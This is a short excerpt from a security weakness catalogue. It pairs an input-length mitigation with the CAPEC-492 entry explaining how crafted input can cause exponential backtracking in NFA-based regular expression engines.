Mitigation
Implementation

Limit the length of the input that the regular expression will process.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.